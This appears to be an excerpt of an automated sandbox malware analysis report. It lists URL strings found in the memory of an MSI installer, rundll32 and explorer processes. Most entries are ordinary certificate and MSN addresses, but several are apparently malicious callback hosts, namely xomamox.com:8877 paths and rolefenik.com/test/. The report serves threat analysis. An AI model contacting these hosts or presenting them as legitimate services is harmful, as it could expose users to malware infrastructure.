            Source: lavi.msi, MSI2586.tmp.2.dr, MSI25D6.tmp.2.dr, 5d243d.msi.2.dr, MSI2527.tmp.2.dr, MSI2635.tmp.2.dr, MSI2701.tmp.2.dr, MSI25B6.tmp.2.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
            Source: explorer.exe, 0000000B.00000002.3895491206.0000000004405000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289118490.0000000004405000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ns.adobeS
            Source: explorer.exe, 0000000B.00000002.3900236624.0000000009267000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.3076305289.0000000009267000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2866404374.0000000009267000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2290826677.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2291389093.0000000009267000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: lavi.msi, MSI2586.tmp.2.dr, MSI25D6.tmp.2.dr, 5d243d.msi.2.dr, MSI2527.tmp.2.dr, MSI2635.tmp.2.dr, MSI2701.tmp.2.dr, MSI25B6.tmp.2.drString found in binary or memory: http://ocsp.digicert.com0C
            Source: lavi.msi, MSI2586.tmp.2.dr, MSI25D6.tmp.2.dr, 5d243d.msi.2.dr, MSI2527.tmp.2.dr, MSI2635.tmp.2.dr, MSI2701.tmp.2.dr, MSI25B6.tmp.2.drString found in binary or memory: http://ocsp.digicert.com0O
            Source: explorer.exe, 0000000B.00000000.2290826677.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3900236624.00000000090DA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
            Source: rundll32.exe, 00000006.00000003.2285809473.000001A992861000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A992827000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A9928B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A992847000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A992861000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2285729240.000001A9928B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A9928B6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3476379460.000001A9928B6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3476449786.000001A9928B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r11.i.lencr.org/0
            Source: rundll32.exe, 00000006.00000003.2285809473.000001A992861000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A992827000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A9928B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A992847000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A992861000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2285729240.000001A9928B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A9928B6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3476379460.000001A9928B6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3476449786.000001A9928B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://r11.o.lencr.org0#
            Source: explorer.exe, 0000000B.00000002.3898266932.0000000007710000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000002.3898287903.0000000007720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000002.3894546786.0000000002C80000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
            Source: lavi.msi, MSI2586.tmp.2.dr, MSI25D6.tmp.2.dr, 5d243d.msi.2.dr, MSI2527.tmp.2.dr, MSI2635.tmp.2.dr, MSI2701.tmp.2.dr, MSI25B6.tmp.2.drString found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
            Source: lavi.msi, MSI2586.tmp.2.dr, MSI25D6.tmp.2.dr, 5d243d.msi.2.dr, MSI2527.tmp.2.dr, MSI2635.tmp.2.dr, MSI2701.tmp.2.dr, MSI25B6.tmp.2.drString found in binary or memory: http://t2.symcb.com0
            Source: lavi.msi, MSI2586.tmp.2.dr, MSI25D6.tmp.2.dr, 5d243d.msi.2.dr, MSI2527.tmp.2.dr, MSI2635.tmp.2.dr, MSI2701.tmp.2.dr, MSI25B6.tmp.2.drString found in binary or memory: http://tl.symcb.com/tl.crl0
            Source: lavi.msi, MSI2586.tmp.2.dr, MSI25D6.tmp.2.dr, 5d243d.msi.2.dr, MSI2527.tmp.2.dr, MSI2635.tmp.2.dr, MSI2701.tmp.2.dr, MSI25B6.tmp.2.drString found in binary or memory: http://tl.symcb.com/tl.crt0
            Source: lavi.msi, MSI2586.tmp.2.dr, MSI25D6.tmp.2.dr, 5d243d.msi.2.dr, MSI2527.tmp.2.dr, MSI2635.tmp.2.dr, MSI2701.tmp.2.dr, MSI25B6.tmp.2.drString found in binary or memory: http://tl.symcd.com0&
            Source: lavi.msi, MSI2586.tmp.2.dr, MSI25D6.tmp.2.dr, 5d243d.msi.2.dr, MSI2527.tmp.2.dr, MSI2635.tmp.2.dr, MSI2701.tmp.2.dr, MSI25B6.tmp.2.drString found in binary or memory: http://www.digicert.com/CPS0
            Source: explorer.exe, 0000000B.00000000.2290826677.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3900236624.0000000009237000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c
            Source: rundll32.exe, 00000006.00000003.2285809473.000001A992861000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2285809473.000001A992830000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A992827000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A992861000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A9927C8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2285729240.000001A9928B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A9928B6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3476379460.000001A9928B6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3476449786.000001A9928B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: rundll32.exe, 00000006.00000003.2285809473.000001A992861000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2285809473.000001A992830000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A992827000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A992861000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A9927C8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2285729240.000001A9928B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A9928B6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3476379460.000001A9928B6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3476449786.000001A9928B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: explorer.exe, 0000000B.00000002.3903919653.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2294125458.000000000BC80000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
            Source: explorer.exe, 0000000B.00000002.3903919653.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2294125458.000000000BC80000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
            Source: explorer.exe, 0000000B.00000002.3903919653.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2294125458.000000000BC80000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSA4
            Source: explorer.exe, 0000000B.00000002.3903919653.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2294125458.000000000BC80000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSd
            Source: explorer.exe, 0000000B.00000002.3896365823.0000000007046000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289872722.0000000007046000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2866104583.000000000704B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
            Source: explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
            Source: explorer.exe, 0000000B.00000000.2290826677.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3900236624.00000000090DA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
            Source: explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0E948A694F8C48079B908C8EA9DDF9EA&timeOut=5000&oc
            Source: explorer.exe, 0000000B.00000002.3900236624.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2290826677.00000000091FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
            Source: explorer.exe, 0000000B.00000002.3900236624.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2290826677.00000000091FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
            Source: explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
            Source: explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
            Source: explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg
            Source: explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi
            Source: explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
            Source: explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
            Source: explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
            Source: explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
            Source: explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k
            Source: explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k-dark
            Source: explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA
            Source: explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA-dark
            Source: explorer.exe, 0000000B.00000002.3900212004.0000000008E4E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ergiholim.com/test/
            Source: explorer.exe, 0000000B.00000000.2294093045.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3903919653.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
            Source: explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
            Source: explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
            Source: explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1b2aMG.img
            Source: explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
            Source: explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hGNsX.img
            Source: explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAT0qC2.img
            Source: explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
            Source: explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBYTL1i.img
            Source: explorer.exe, 0000000B.00000000.2294093045.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3903919653.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
            Source: explorer.exe, 0000000B.00000000.2294093045.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3903919653.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comer
            Source: explorer.exe, 0000000B.00000002.3908559264.000000000C17B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3908508770.000000000C0FD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://rolefenik.com/
            Source: explorer.exe, 0000000B.00000002.3906622826.000000000C08D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://rolefenik.com/0
            Source: explorer.exe, 0000000B.00000002.3908508770.000000000C0FD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://rolefenik.com/=
            Source: explorer.exe, 0000000B.00000002.3908559264.000000000C17B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://rolefenik.com/F
            Source: explorer.exe, 0000000B.00000002.3908559264.000000000C17B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3900236624.0000000009267000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3900236624.0000000009330000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3908508770.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3903919653.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3903919653.000000000BDA9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://rolefenik.com/test/
            Source: explorer.exe, 0000000B.00000002.3900236624.0000000009330000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://rolefenik.com/test/:
            Source: explorer.exe, 0000000B.00000002.3903919653.000000000BDA9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://rolefenik.com/test/O
            Source: explorer.exe, 0000000B.00000002.3908508770.000000000C0FD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://rolefenik.com/test/Q
            Source: explorer.exe, 0000000B.00000002.3900236624.0000000009330000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://rolefenik.com/test/W
            Source: explorer.exe, 0000000B.00000002.3906622826.000000000C061000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://rolefenik.com/test/ser-l1-1-0
            Source: explorer.exe, 0000000B.00000002.3900236624.0000000009330000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://rolefenik.com/test/v
            Source: explorer.exe, 0000000B.00000002.3903919653.000000000BC80000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://rolefenik.com/test/xtMenuArray_198721XV
            Source: explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal
            Source: explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
            Source: explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
            Source: explorer.exe, 0000000B.00000000.2294125458.000000000BDF5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/EM0
            Source: explorer.exe, 0000000B.00000000.2294093045.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3903919653.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com48
            Source: lavi.msi, MSI2586.tmp.2.dr, MSI25D6.tmp.2.dr, 5d243d.msi.2.dr, MSI2527.tmp.2.dr, MSI2635.tmp.2.dr, MSI2701.tmp.2.dr, MSI25B6.tmp.2.drString found in binary or memory: https://www.advancedinstaller.com
            Source: lavi.msi, MSI2586.tmp.2.dr, MSI25D6.tmp.2.dr, 5d243d.msi.2.dr, MSI2527.tmp.2.dr, MSI2635.tmp.2.dr, MSI2701.tmp.2.dr, MSI25B6.tmp.2.drString found in binary or memory: https://www.digicert.com/CPS0
            Source: explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
            Source: explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it
            Source: explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-big-3-mistakes-financial-advisors-say-that-the-1
            Source: explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al
            Source: explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi
            Source: explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
            Source: explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/predicting-what-the-pac-12-would-look-like-after-expansion-wi
            Source: explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world
            Source: explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/washington-state-ad-asks-ncaa-for-compassion-and-understandin
            Source: explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
            Source: explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/
            Source: explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09
            Source: explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt
            Source: explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
            Source: lavi.msi, MSI2586.tmp.2.dr, MSI25D6.tmp.2.dr, 5d243d.msi.2.dr, MSI2527.tmp.2.dr, MSI2635.tmp.2.dr, MSI2701.tmp.2.dr, MSI25B6.tmp.2.drString found in binary or memory: https://www.thawte.com/cps0/
            Source: lavi.msi, MSI2586.tmp.2.dr, MSI25D6.tmp.2.dr, 5d243d.msi.2.dr, MSI2527.tmp.2.dr, MSI2635.tmp.2.dr, MSI2701.tmp.2.dr, MSI25B6.tmp.2.drString found in binary or memory: https://www.thawte.com/repository0W
            Source: rundll32.exe, 00000006.00000003.2285809473.000001A992830000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A992827000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xomamox.com/
            Source: rundll32.exe, 00000006.00000003.2285809473.000001A992861000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A992861000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xomamox.com:8877/
            Source: rundll32.exe, 00000006.00000002.3893692135.000001A992861000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xomamox.com:8877/49
            Source: rundll32.exe, 00000006.00000003.2285809473.000001A992861000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A992861000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xomamox.com:8877/T
            Source: rundll32.exe, 00000006.00000002.3893692135.000001A992861000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A9927C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xomamox.com:8877/forest.php
            Source: rundll32.exe, 00000006.00000002.3893692135.000001A9927C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xomamox.com:8877/forest.phpl
            Source: rundll32.exe, 00000006.00000003.2285809473.000001A992861000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2285809473.000001A992830000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A992827000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A992861000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xomamox.com:8877/gump.php
            Source: rundll32.exe, 00000006.00000002.3893692135.000001A992861000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xomamox.com:8877/gump.php-
            Source: rundll32.exe, 00000006.00000003.2285809473.000001A992861000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xomamox.com:8877/gump.phpx
            Source: rundll32.exe, 00000006.00000002.3893692135.000001A992861000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xomamox.com:8877/re
            Source: unknownNetwork traffic detected: HTTP traffic on port 58111 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 58096 -> 443
